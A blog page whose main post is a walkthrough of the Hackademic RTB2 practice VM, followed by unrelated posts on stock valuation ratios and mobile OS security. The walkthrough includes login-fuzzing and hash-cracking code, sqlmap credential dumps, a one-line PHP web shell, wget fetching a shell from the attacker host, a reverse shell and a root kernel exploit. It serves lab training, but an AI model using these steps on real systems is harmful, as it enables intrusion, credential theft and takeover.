Hackademic-RTB2

Hacking 2014. 8. 19. 05:22


Introduction

Description

Hackademic RTB2 is the second edition of the Hackademic vulnerable virtual machine. The first challenge (RTB1) is described here.

Installation

Hackademic RTB2 can be downloaded from the following places:

Check the md5sum: 4c35e875e0ae2f872af6751f259b82b7

Environment

  • Attacker: 192.168.1.43 (BackTrack 5 R2)
  • Victim: 192.168.1.9 (VMWare Fusion)

Should you need to discover the IP address of your target, use tools like fping, netdiscover or nmap.

Challenge

Assessment

Services/Versions

A first nmap scan shows a web server on port 80/tcp and a service on port 666/tcp that appears filtered:

root@bt:~# nmap -sS 192.168.1.9

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-04-08 07:57 EDT
Nmap scan report for 192.168.1.9
Host is up (0.00072s latency).
Not shown: 998 closed ports
PORT    STATE    SERVICE
80/tcp  open     http
666/tcp filtered doom
MAC Address: 00:0C:29:E5:3D:EC (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.18 seconds

A complete scan (TCP and UDP, with version and OS detection) gives the following results. Note that this scan was run on a different day, when the VM answered at 192.168.1.10:

root@bt:/pentest/database/sqlmap# nmap -sS -sU -A 192.168.1.10

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-04-07 16:36 EDT
Nmap scan report for 192.168.1.10
Host is up (0.00036s latency).
Not shown: 1950 closed ports, 47 open|filtered ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.2.14 ((Ubuntu))
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Hackademic.RTB2
666/tcp  open  http    Apache httpd 2.2.14 ((Ubuntu))
| http-robots.txt: 14 disallowed entries 
| /administrator/ /cache/ /components/ /images/ 
| /includes/ /installation/ /language/ /libraries/ /media/ 
|_/modules/ /plugins/ /templates/ /tmp/ /xmlrpc/
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Hackademic.RTB2
5353/udp open  mdns    DNS-based service discovery
| dns-service-discovery: 
|   9/tcp workstation
|_    Address=192.168.1.10 2a01:e35:8b15:3430:20c:29ff:fee5:3dec
MAC Address: 00:0C:29:E5:3D:EC (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.17 - 2.6.36
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.36 ms 192.168.1.10

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1119.53 seconds

Port 666/tcp, reported filtered by the first scan, now shows as open and serving the same Apache, with a robots.txt typical of Joomla. A port that alternates between filtered and open is a strong hint of port knocking. The service on 5353/udp is mDNS (DNS-based service discovery), which simply advertises the host on the LAN.

Web service

Let's analyze what could be interesting on port 80/tcp. Point your browser to the root of the target:

Hackademic-RTB2-001.png

Using DirBuster also discloses the presence of a phpMyAdmin interface:

Hackademic-RTB2-002.png

Find vulnerabilities in the first form

Let's try to find a vulnerability in the first authentication form. I used w3af as well as sqlmap but found no SQL injection. Fuzzing the password field with Burp Suite's Intruder module eventually reveals what looks like an SQL injection:

Hackademic-RTB2-003.png

Notice that this is a real fuzzing exercise (and, I must confess, partly a matter of luck): to hit it you need the full list of SQL injection strings shipped with Burp Suite, each one also tried with a single quote appended. On the other hand, the authentication mechanism does not use a database at all. The PHP source, once read later, shows that the following combination is hard-coded:

  • login: admin
  • password: ' or 1=1 --'

Anyway, this combination leads to a new message as well as a long encoded string:

Hackademic-RTB2-004.png
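The Intruder run above boils down to one loop: send every payload (with and without a trailing quote) and flag any response that differs from the response to a plainly wrong password. Here is that loop as an added Python example; it is not code from the write-up, the form field names in http_sender are assumptions, and fake_target is an offline stand-in that only mimics the hard-coded check the text describes.

```python
"""Fuzz a login form's password field with a payload list and flag responses
that differ from a baseline. Added example; the field names and the fake
target below are assumptions, not taken from the Hackademic VM."""
import urllib.parse
import urllib.request

# A constructed handful of SQL-injection strings of the kind Burp Intruder ships with.
SQLI_PAYLOADS = [
    "' or 1=1 --",
    "' or '1'='1",
    "admin'--",
    "1' or '1'='1",
    "\" or 1=1 --",
]


def build_payloads(base):
    """Each string as-is, then again with a single quote appended (the variant
    that turned out to matter on this VM)."""
    out = []
    for p in base:
        out.append(p)
        out.append(p + "'")
    return out


def fuzz_login(send, login, payloads, baseline_password="definitely-wrong-password"):
    """send(login, password) -> response body. Returns [(payload, body)] for every
    payload whose response differs from the response to a plainly wrong password.
    Exact comparison is deliberate for a static page; strip CSRF tokens or
    timestamps first if the target's pages vary between requests."""
    baseline = send(login, baseline_password)
    hits = []
    for p in payloads:
        body = send(login, p)
        if body != baseline:
            hits.append((p, body))
    return hits


def http_sender(url, login_field="username", password_field="password"):
    """Real sender: POSTs the two form fields (names assumed) and returns the body."""
    def send(login, password):
        data = urllib.parse.urlencode({login_field: login, password_field: password}).encode()
        with urllib.request.urlopen(url, data=data, timeout=10) as resp:
            return resp.read().decode("utf-8", errors="replace")
    return send


def fake_target(login, password):
    """Offline stand-in mimicking the VM's hard-coded check (the only part of
    the target's logic the write-up actually describes)."""
    if login == "admin" and password == "' or 1=1 --'":
        return "Knock knock knockin' on heaven's door ... <encoded string>"
    return "Wrong username or password"


def demo():
    """Run the fuzzer against the stand-in; returns the list of hits."""
    return fuzz_login(fake_target, "admin", build_payloads(SQLI_PAYLOADS))


if __name__ == "__main__":
    for payload, body in demo():
        print("HIT %r -> %r" % (payload, body))
```

Against the real form you would pass `http_sender("http://192.168.1.9/login.php")` (path assumed) instead of fake_target; the only hit is the doubly-quoted string, which is exactly why a tool that tries the canonical payloads alone (w3af, sqlmap) reports nothing here.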

Find the port-knocking combination

First decode the message carried in the URL. It looks like a hex-encoded string. Use an online converter to decode it (e.g. http://home.paulschou.net/tools/xlate/):

Hackademic-RTB2-005.png

The hint "Knock knock knockin' on heaven's door" confirms that this string leads to the port-knocking combination. Copy the binary part of the message, paste it in the binary field and decode it:

Hackademic-RTB2-006.png

Open port 666/tcp

The combination is 1001:1101:1011:1001. Let's assume it is a sequence of TCP ports that must be hit, in order, to open port 666/tcp on the target. We use netcat to knock (nc -z only attempts a connection, which is all a knock daemon needs to see; the ports themselves stay closed):

# for i in 1001 1101 1011 1001; do nc -z 192.168.1.9 $i; done

Let's check that the service is now reachable by pointing the browser to http://192.168.1.9:666. It works: we can see the welcome page of a Joomla 1.5 portal.

Find a vulnerability in the second application

Now, time to find a vulnerability in the second application, the Joomla portal. Let's look for an SQL injection. sqlmap, pointed at the URL of the com_abc component, finds one and dumps the MySQL users:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.1.9:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...&Itemid=3" -D mysql -T user -C User,Password --dump
+-------------------------------------------+------------------+
| Password                                  | User             |
+-------------------------------------------+------------------+
| *5D3C124406BF85494067182754131FF4DAB9C6C7 | root             |
| *F36E6519B0B1D62AA2D5346EFAD66D1CAF248996 | debian-sys-maint |
| *5D3C124406BF85494067182754131FF4DAB9C6C7 | phpmyadmin       |
+-------------------------------------------+------------------+

However, these hashes are not known from previous cracks and, although John the Ripper could work on them, it might take hours or days. Notice anyway that root and phpmyadmin share the same hash: since this hash format is unsalted, they share the same password.

Let's try to dump the users from the Joomla database:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.1.9:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...&Itemid=3" \
   -D joomla -T jos_users -C name,password,username,usertype --dump
+----------------+-------------------------------------------------------------------+---------------+-----------------------+
| name           | password                                                          | username      | usertype              |
+----------------+-------------------------------------------------------------------+---------------+-----------------------+
| Administrator  | 08f43b7f40fb0d56f6a8fb0271ec4710:n9RMVci9nqTUog3GjVTNP7IuOrPayqAl | Administrator | Super%20Administrator |
| John%20Smith   | 992396d7fc19fd76393f359cb294e300:70NFLkBrApLamH9VNGjlViJLlJsB60KF | JSmith        | Registered            |
| Billy%20Tallor | abe1ae513c16f2a021329cc109071705:FdOrWkL8oMGl1Tju0aT7ReFsOwIMKliy | BTallor       | Registered            |
+----------------+-------------------------------------------------------------------+---------------+-----------------------+

But once again, reversing the hashes is not straightforward. However, sqlmap can read files from the server when the injected database user holds the FILE privilege. Let's read Joomla's configuration file:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.1.9:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...&Itemid=3" \
   --file-read="/var/www/configuration.php"
/var/www/configuration.php file saved to:    
'/pentest/database/sqlmap/output/192.168.1.9/files/_var_www_configuration.php'

Let's see what's inside:

root@bt:/pentest/database/sqlmap# egrep -i "user|password" output/192.168.1.9/files/_var_www_configuration.php 
var $user = 'root';
var $password = 'yUtJklM97W';
var $ftp_user = ;
var $offset_user = '0';
var $smtpuser = ;
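Both dumped hash formats are well known: Joomla 1.5 stores md5(password + salt) followed by ":" and the 32-character salt, and the "*" hashes in mysql.user are MySQL's native format, "*" plus the upper-case hex of SHA1(SHA1(password)). The added Python below (not from the write-up; the wordlist is constructed) verifies and wordlist-cracks both, and also lets you confirm, once configuration.php has given up 'yUtJklM97W', that it is indeed the password behind the root hash in the dump.

```python
"""Verify or wordlist-crack the two hash formats dumped above: Joomla 1.5
(md5(password + salt):salt) and MySQL native ('*' + SHA1(SHA1(password)) in
upper-case hex). Added example, not from the write-up; the wordlist is constructed."""
import hashlib
import hmac
import secrets
import string

_SALT_ALPHABET = string.ascii_letters + string.digits


def joomla15_hash(password, salt=None):
    """Joomla 1.5 stores md5(plaintext . salt) + ':' + salt with a 32-char salt."""
    if salt is None:
        salt = "".join(secrets.choice(_SALT_ALPHABET) for _ in range(32))
    digest = hashlib.md5((password + salt).encode("utf-8")).hexdigest()
    return digest + ":" + salt


def joomla15_verify(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    if ":" not in stored:
        return False
    _, salt = stored.split(":", 1)
    return hmac.compare_digest(joomla15_hash(password, salt), stored)


def mysql_native_hash(password):
    """MySQL PASSWORD(): '*' + hex(SHA1(SHA1(password))), upper case, no salt."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def mysql_native_verify(password, stored):
    return hmac.compare_digest(mysql_native_hash(password), stored.upper())


def crack(stored, wordlist, verify):
    """Return the first candidate that verifies against `stored`, else None.
    One MD5 or two SHA1s per guess is cheap, which is why the dumped accounts
    are only as safe as their passwords are unusual."""
    for candidate in wordlist:
        if verify(candidate, stored):
            return candidate
    return None


def same_password(mysql_hash_a, mysql_hash_b):
    """Unsalted format: equal hashes mean equal passwords (root vs. phpmyadmin above)."""
    return mysql_hash_a.upper() == mysql_hash_b.upper()


if __name__ == "__main__":
    wordlist = ["123456", "password", "letmein", "yUtJklM97W"]  # constructed
    dumped_root = "*5D3C124406BF85494067182754131FF4DAB9C6C7"
    print("mysql root password:", crack(dumped_root, wordlist, mysql_native_verify))
    print("joomla demo:", crack(joomla15_hash("letmein"), wordlist, joomla15_verify))
```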

Set up a backdoor

Now that we have the MySQL root password, let's log into the phpMyAdmin interface. Go to http://192.168.1.9/phpmyadmin and use the credentials above.

Open an SQL window and write a rudimentary web shell, which we will then use to fetch a more complete one. This only works because the MySQL root account holds the FILE privilege, secure_file_priv does not restrict the destination, and the MySQL server process is allowed to write into /var/www (all true on this VM; otherwise the query fails with an access error):

SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/shell.php';

Let's test it:

Hackademic-RTB2-007.png

Now, let's fetch a more complete PHP shell. Download it on your BackTrack box, uncompress it in your /var/www/ directory and start your web server (/etc/init.d/apache2 start).

From your browser, use following commands:

http://192.168.1.9:666/shell.php?cmd=wget%20http://192.168.1.43/phpshell.txt

The above command downloads the PHP shell into the target's web root (it is kept as .txt on the attacking host so that our own Apache serves its source instead of executing it). Now rename it to .php:

http://192.168.1.9:666/shell.php?cmd=mv%20/var/www/phpshell.txt%20/var/www/phpshell.php

You should now be able to access your PHP shell:

Hackademic-RTB2-008.png

Reverse shell

To get a reverse shell, open a listener on your BackTrack with netcat:

nc -lvvp 5555

And from the "Back Connect" feature (top menu of the PHP shell interface), configure it as follows:

Hackademic-RTB2-009.png

From your BackTrack terminal, you now have an interactive shell on the machine, with the limited privileges of www-data:

root@bt:~# nc -lvvp 5555
listening on [any] 5555 ...
192.168.1.9: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.1.43] from (UNKNOWN) [192.168.1.9] 48972
expr: syntax error
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
cd /root
cd: 3: can't cd to /root
uname -a
Linux HackademicRTB2 2.6.32-24-generic #39-Ubuntu SMP Wed Jul 28 06:07:29 UTC 2010 i686 GNU/Linux

Privileges escalation

After some research on http://www.exploit-db.com, you will find an exploit that works against this Ubuntu 2.6.32 kernel (http://www.exploit-db.com/download/14814).

From your reverse shell, download it, compile it and execute it (gcc is installed on the target; the chmod is redundant since gcc already produces an executable, but harmless):

wget http://www.exploit-db.com/download/14814 -O 14814.c
gcc 14814.c -o 14814
chmod +x 14814
./14814
id
uid=0(root) gid=0(root)

Decrypt the key

Key.txt in /root contains a base64-encoded blob (not a hash). Let's decode it and see what it is:

base64 -d Key.txt > output
file output
output: PNG image, 756 x 344, 8-bit/color RGB, non-interlaced

It's a PNG image. Copy it to /var/www so that it can be fetched with a browser from the attacking host:

mv output /var/www/

Here it is:

Hackademic-009.png
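What `file` did above is read the PNG signature and the IHDR chunk. As an added Python example (not part of the write-up), here is that identification done by hand, with a constructed base64 Key.txt standing in for the real one so the code runs offline; the dimensions are taken from the `file` output above.

```python
"""Decode a base64 Key.txt and identify the result from its magic bytes and PNG
IHDR chunk, i.e. what `file` reported above. Added example; the sample header
is constructed here, not the VM's real image."""
import base64
import struct

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
COLOR_TYPES = {0: "grayscale", 2: "RGB", 3: "colormap", 4: "gray+alpha", 6: "RGBA"}


def decode_key_file(text):
    """Key.txt is base64, possibly wrapped over several lines; reject junk input."""
    return base64.b64decode("".join(text.split()), validate=True)


def identify_png(data):
    """Parse signature + IHDR; return a dict, or None if this is not a PNG.
    Chunk CRCs are not checked: this is identification, not validation."""
    if len(data) < 29 or not data.startswith(PNG_SIGNATURE):
        return None
    length, ctype = struct.unpack(">I4s", data[8:16])
    if ctype != b"IHDR" or length != 13:
        return None
    width, height, depth, color, _comp, _filt, interlace = struct.unpack(">IIBBBBB", data[16:29])
    return {"width": width, "height": height, "bit_depth": depth,
            "color": COLOR_TYPES.get(color, "unknown"), "interlaced": bool(interlace)}


def describe(data):
    """One-line description in the spirit of `file`."""
    info = identify_png(data)
    if info is None:
        return "data"
    return "PNG image, %d x %d, %d-bit/color %s, %s" % (
        info["width"], info["height"], info["bit_depth"], info["color"],
        "interlaced" if info["interlaced"] else "non-interlaced")


def sample_png_header(width=756, height=344):
    """Constructed: signature + IHDR for an 8-bit RGB image (CRC left as zeros)."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    return PNG_SIGNATURE + struct.pack(">I", len(ihdr)) + b"IHDR" + ihdr + b"\0\0\0\0"


def sample_key_txt():
    """Constructed Key.txt contents: the sample header, base64'd and line-wrapped."""
    b64 = base64.b64encode(sample_png_header()).decode("ascii")
    return "\n".join(b64[i:i + 20] for i in range(0, len(b64), 20)) + "\n"


if __name__ == "__main__":
    print(describe(decode_key_file(sample_key_txt())))
```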


Posted by CEOinIRVINE

Valuation

Finance & EMBA 2014. 8. 12. 07:16

Wall Street investors and stock analysts scrutinize a company's financial statements and stock performance carefully in order to arrive at what they believe to be a realistic estimate of that company's value. Since a share of stock denotes ownership of a part of the company, analysts are interested in knowing whether the market price of that share is a good deal relative to the underlying value of the piece of the company the share represents.

Wall Street uses various means of valuation, that is, of assessing a company's financial performance in relation to its stock price.

  • Earnings per share (EPS): EPS equals net income divided by the number of shares outstanding. This is one of the most commonly watched indicators of a company's financial performance. If it falls, it will likely take the stock's price down with it.
  • Price-to-earnings ratio (PE): The PE ratio is the current price of a share of stock divided by the previous 12 months' earnings per share. It is a common measure of how cheap or expensive a stock is, relative to earnings.
  • Price-to-book ratio: This ratio is the current market price of a share of stock divided by a stock's book value per share. (To calculate the book value, subtract the preferred stock total from total equities, and then divide the result by the number of shares outstanding.)
  • Growth indicators: Growth measures can tell a great deal about financial health. A company's growth allows it to provide increasing returns to its shareholders, and to provide opportunities for new and existing employees. The number of years over which you should measure growth will depend on the business cycle of the industry the company is in. A one-year growth figure for an oil company—an industry that typically has long business cycles—probably doesn't tell you very much. But a strong one-year growth figure for an Internet company would be significant. Common measures of growth include sales growth, profitability growth, and growth in earnings per share.



Mobile security: iOS vs. Android vs. BlackBerry vs. Windows Phone

The BYOD phenomenon is old news, with support from most companies. For IT organizations, that means ensuring proper security and management over the mobile devices employees are likely to use. In the last year, Apple’s iPhone and iPad have become the new corporate standards due to high user satisfaction and superior security capabilities. iOS 7 pushes Apple’s management and security into new areas, including application management and licensing.

But Samsung has been aggressively promoting its SAFE (Samsung Approved for Enterprise) extensions to Android and its add-on Knox management APIs to bolster its reach into businesses wary of Google’s historic lack of concern for security and the rampant malware on Android devices. SAFE targets the first concern. BlackBerry, once the IT darling due to its hundreds of security capabilities, is also trying to gain corporate respect with BlackBerry 10, which supports basic Exchange ActiveSync (EAS) policies out of the box (a first for BlackBerry), as well as a rich set of security features in its retooled BES 10 management server.

Then there’s Windows Phone 8, the third version of Microsoft’s attempt to deliver a popular smartphone OS. It’s historically given little heed to security concerns, but Version 8 endeavors to satisfy basic business security concerns. And the forthcoming Windows Phone 8.1 increases its capabilities even further.

Mobile security falls into two fundamental forms: Microsoft’s EAS policies and native APIs.

Exchange ActiveSync policy support compared
Microsoft Exchange, Microsoft System Center 2012, Google Docs for Business, and various third-party management tools support EAS policies out of the box. According to mobile analyst Chris Hazelton at the 451 Group, the core EAS policies cover most businesses’ needs. But as Table 1 below shows, the various mobile OSes support different EAS policies; EAS support in and of itself doesn’t tell you what security level you get.

Apple’s iOS 4.2 was the first major modern mobile OS to support EAS policies, and it helped catapult the iPhone to enterprise dominance. Since then, Google has increased Android’s EAS coverage in each version, with Android 4 supporting more EAS policies than previous versions. Samsung, the leading Android maker, has added policy support as well as APIs to Android 4 to many of its devices. (I detail which EAS policies each version of Android and Windows Phone support in the article “How Windows Phone 8 security compares to iOS and Android.”)

When you compare Windows Phone 8’s EAS policy support to that of Windows Phone 7.5, there’s not much difference. “Microsoft has not really added much on the management end,” notes J.P. Halebeed, global director of R&D at mobile device management (MDM) vendor AirWatch. A critical addition is support for encryption on the device (it’s on by default for internal storage, but not for SD cards) and the related support for EAS’s encryption policies. The lack of support for encryption had been one of the biggest barriers to Windows Phone’s business acceptance. Microsoft also supports the new information rights management (IRM) EAS policy, which lets companies enable rights management for data on devices; Microsoft of course has a corresponding IRM server product. But Windows Phone 8.1 does make some real leaps forward, as the tables in this article show.

Finally, BlackBerry added EAS support to the new BlackBerry 10 OS; previous versions could be secured only through the BlackBerry Enterprise Server (BES).

Table 1: EAS policy support compared

(“MDM” means a separate mobile device management server is required; “NA” means the policy does not apply to that platform)

Policy | Apple iOS 6, 7 | Google Android 4 | Samsung Android 4 + SAFE | BlackBerry 10 | Microsoft Windows Phone 8
Allow device encryption | Yes | Yes | Yes | Yes | Yes
Require device encryption | Yes | No | MDM | Yes | Yes
Encrypt storage card | NA | Yes | Yes | No | Yes
Minimum password length | Yes | Yes | Yes | Yes | Yes
Minimum number of complex characters (password) | Yes | Yes | Yes | Yes | Yes
Password history | Yes | Yes | Yes | Yes | Yes
Device wipe threshold | Yes | Yes | Yes | Yes | Yes
Disable removable storage | MDM | No | MDM | No** | No
Disable camera | Yes | Yes | Yes | No** | No
Disable SMS text messaging | No | No | No | No | No
Disable Wi-Fi | MDM | No | MDM | No | No**
Disable Bluetooth | MDM | No | MDM | No** | No
Disable IrDA | NA | No | No | No | No
Require manual sync while roaming | Yes | Yes | Yes | No** | No
Allow Internet sharing from device | MDM | No | MDM | No** | MDM
Allow desktop sharing from device | MDM | No | MDM | No | No
Disable email attachment access | Yes | Yes | Yes | No | Yes
Disable POP3/IMAP4 email | MDM | No | No | Yes | No
Allow consumer email | No | No | No | No | No
Allow browser | Yes | MDM | MDM | No | MDM
Configure message formats (HTML or plain text) | No | No | No | No | No
Include past email items (days) | Yes | No | No | Yes | Yes
Email body truncation size (KB) | No | No | No | No | No**
HTML email body truncation size (KB) | No | No | No | No | No**
Include past calendar items (days) | No | No | No | Yes | No
Require signed S/MIME messages | No | No | No | No | No**
Require encrypted S/MIME messages | No | No | No | No | No**
Require signed S/MIME algorithm | No | No | No | No | No**
Require encrypted S/MIME algorithm | No | No | No | No | No**
Allow S/MIME encrypted algorithm negotiation | No | No | No | No | No**
Allow S/MIME soft certs | No | No | No | No | No**

Native security and management API capabilities compared
The other form of mobile security comes from the APIs in each mobile OS. These APIs vary widely across the OSes, and each requires a management tool. Many MDM tools support multiple mobile OSes, providing a single console for IT admins. Some also offer client apps that add capabilities not found in the native APIs, though this typically forces users to opt for proprietary email and other apps for business purposes. Table 2 below shows some of the more commonly requested management features typically implemented through APIs.

Apple, for example, has several dozen such APIs that use remotely installed configuration profiles not only to configure various iOS settings (such as preconfiguring VPN or allowed access points) but also to manage app behavior (such as disallowing the forwarding of corporate messages via personal accounts in Mail). iOS 6 added several new policies, including the ability to prevent app removal, lock a user to a specific app (such as for kiosk or retail usage), and prevent paid apps from being purchased. All are part of what iOS calls a supervised environment, in which the iPhone or iPad is treated as an appliance. iOS 7 adds a set of APIs for application management, including managed Open In, per-app VPNs, managed copy and paste across apps, and single sign-on, as well as true license management and profile-based app installation.

Along the same lines, in Windows Phone 8, Microsoft supports the ability to revoke applications, restrict email forwarding, remotely enroll or unenroll devices, and remotely update business-provisioned apps. One capability in Windows Phone 8 not available to other mobile OSes is its integration with Active Directory, notes Ahmed Datoo, vice president of marketing at MDM vendor Zenprise. This means that MDM tools such as Zenprise’s can access the Active Directory groups, then assign policies to those groups rather than maintain a separate set of groups in the MDM tool from the set in Active Directory. That’s a time-saver for IT, he notes; it reduces the risk of employees not being in the correct groups for the policies that should apply or falling through the cracks when terminated in, say, Active Directory but not in the MDM tool’s user database.

Microsoft and Google provide far fewer such capabilities in their APIs, though Samsung and Google’s Motorola Mobility unit have added their own security APIs to their Android 4 devices. For example, Samsung’s SAFE APIs allow IT admins to disable cameras, Bluetooth, tethering, voice recording, SD cards, and Wi-Fi.

Microsoft uses a central manager in Windows Phone 8 called DM Client that contains all the relevant user and corporate profiles (like the Windows Registry, in effect), rather than rely on a set of separate installed configuration profiles (like the OS X System Folder, in effect). And on September 17, Microsoft finally attained FIPS 140-2 certification, joining BlackBerry 10, iOS 6 and 7, and Samsung SAFE Android devices for this key federal security standard. 

Then there’s BlackBerry, the godfather of mobile security and management. Its BES offers hundreds of controls, and its Balance technology lets IT create a partition on a BlackBerry 10 device to keep personal and work apps and data separate. BlackBerry has a fairly confusing set of MDM products as it transitions from its old BlackBerry platform to the new one; I detail its various MDM products and how they relate in the article “BlackBerry’s road map to unified mobile management.”

Table 2: Other native management capabilities compared

(Typically requires a mobile device management server to use)

Capability | Apple iOS 6, 7 | Google Android 4 | Samsung Android 4 + SAFE | BlackBerry 10 + BES 10 | Microsoft Windows Phone 8
Encryption | AES 256, user has no disable option | AES 128, user has disable option, only some models support encryption | AES 256, user has disable option, not all devices support encryption | AES 256, user has disable option | AES 256, user has no disable option
FIPS 140-2 certification | Yes (Level 1) | No | Some models (Level 1) | Yes (Level 2) | Yes (Level 1)
Over-the-air data encryption | Yes | Yes | Yes | Yes | Yes
S/MIME | Yes | No | No | Yes | No**
VPN | Yes | Yes | Yes | Yes | No**
Configure VPN | Yes | Yes | Yes | Yes | No**
Restrict/block app stores | Yes | No | Yes | Yes | Yes
Restrict/block wireless LANs | Yes | No | Yes | Yes | No**
Configure allowable access points | Yes | Yes | Yes | Yes | No**
Signed apps required | Yes | No | No | Yes | Yes
Selective wipe of business apps and data only | Yes | No | Yes | Yes | No**
Remotely update business apps | Yes | No | Yes | Yes | Yes
Secure boot | Yes | Yes* | Yes | Yes | Yes
App sandboxing | Yes | Yes | Yes | Yes | Yes
Disable copy and paste | Yes | Yes | Yes | Yes | No**
Disable iCloud/Microsoft Account/Google Account sync and storage | Yes | No | Yes | Yes | No**


How to think about mobile device management
Ojas Rege, vice president of strategy at MDM vendor MobileIron, describes three bands of management requirements that IT should be thinking about.

The first set of requirements is around configuration and protection of lost or compromised devices. That typically requires password enforcement, encryption enforcement, remote lock and wipe, remote email configuration, certificates for identity, remote connectivity configuration (such as for Wi-Fi and VPNs, though he says this configuration capability is not essential if usage is just for email and over cellular networks), and detection of compromised OSes (such as jailbroken, rooted, or malware-infected ones).

The second set of requirements is around data loss prevention (DLP), which covers privacy controls (such as for user location), cloud-usage controls (such as for iCloud, SkyDrive, and Google Docs), and email DLP controls (such as the ability to restrict email forwarding and to protect attachments). “More regulated environments may require No. 2, and these policies are still TBD for Windows Phone,” Rege notes. By contrast, iOS, BlackBerry, and Android have supported most of these needs since (respectively) iOS 4, BES 5, and Android 3, though a few — such as managing email forwards — are handled outside the OS by MDM clients such as MobileIron’s.

The third set of requirements is around apps, such as their provisioning and data security. Although both Apple and Microsoft have mechanisms to do at least basic app management — iOS can essentially hide an app so that it’s no longer available to a user, and Windows Phone 8 can update corporate apps remotely — mobile application management (MAM) capabilities are mostly up to the mobile management vendors to deploy, Rege says.

All the app stores but Google’s are highly curated. For their mobile OSes, Microsoft and BlackBerry copied Apple’s curated approach, which has kept malware off iOS. Android has no such rigorous control, and although Google now spends more effort to analyze apps, the Google Play market is full of malware. The feds recently announced that industrial-class spyware used in advanced persistent threats has now entered the Google Play market.

All four platforms provide mechanisms for businesses to deploy their own apps directly to users, so they can deploy and manage corporate apps separately from those that users get from the app store. Mobile management tools can connect these mechanisms to group policies and content-management controls.

It’s a no-brainer that iOS and BlackBerry 10 have what it takes for almost any business’s security needs. Android, especially if you get Samsung or Motorola devices, is a plausible platform if you’re not worried about the malware potential. Meanwhile, Windows Phone holds down the rear, appropriate for low-security requirements.

